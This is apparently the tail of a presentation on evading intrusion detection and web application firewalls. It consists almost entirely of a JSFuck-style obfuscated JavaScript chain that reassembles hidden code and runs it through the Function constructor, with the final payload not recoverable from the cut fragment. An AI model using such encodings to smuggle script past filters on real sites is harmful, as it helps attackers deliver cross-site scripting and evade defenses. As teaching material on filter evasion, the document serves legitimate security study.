+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[ +!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]] +(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+ ([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+ !![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]] +(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[ +[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+ !![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(! []+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][ []]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![] +!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+( !![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+ !![]+!![]+[]))+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[]) [+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+ [])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[ ])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]] +([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[] +!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])() )[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!! []+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[ ])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[ !+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+( []+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+! ![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[! +[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+!![]+[])+([]+{})[!+[]+!![]]))() Defeating IDS/IPS/WAF
    • Questions?